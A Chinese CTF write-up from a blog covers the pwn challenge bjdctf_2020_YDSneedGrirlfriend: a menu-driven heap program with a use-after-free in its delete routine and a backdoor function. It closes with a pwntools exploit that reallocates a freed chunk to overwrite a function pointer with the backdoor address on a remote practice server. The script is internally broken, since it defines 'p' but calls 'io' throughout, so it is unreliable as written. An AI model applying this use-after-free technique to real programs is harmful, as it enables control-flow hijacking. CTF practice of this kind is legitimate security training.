bjdctf_2020_YDSneedGrirlfriend【write up】

于 2023-04-14 21:19:00 发布
阅读量147 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/130162273
版权

bjdctf_2020_YDSneedGrirlfriend

惯例我们先来checksec一下

开启了NX和canary的64位程序

请添加图片描述

放进ida64里看看

非常标准的菜单题

main函数

1添加堆 2 删除堆 3打印堆

请添加图片描述

add 添加堆

请添加图片描述

del

未将指针置零 非常明显的uaf漏洞的题目

请添加图片描述

print

请添加图片描述

backdoor

存在后门函数

请添加图片描述

审题完成 开始解题

由于存在backdoor函数因此我们的目标就是调用backdoor函数 又因为del函数中未将指针归零存在uaf漏洞 同时因为add函数中先申请了0x10的chunk因此可以利用这一点

exp:

from pwn import *

p=remote('node4.buuoj.cn',26813)
elf=ELF('./bjdctf_2020_YDSneedGrirlfriend')

def add(size,name):
	io.sendlineafter("Your choice :",'1')
	io.sendlineafter("Her name size is :",str(size))
	io.sendlineafter("Her name is :",name)


def dele(index):
	io.sendlineafter("Your choice :",'2')
	io.sendlineafter("Index :",str(index))

def show(index):
	io.sendlineafter("Your choice :",'3')
	io.sendlineafter("Index :",str(index))

backdoor=0x400b9c
add(0x20,'aaaa')
add(0x20,'bbbb')

dele(0)
dele(1)

add(0x10,p64(backdoor))

show(0)
io.interactive()
爱若 AI_ruo
关注
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值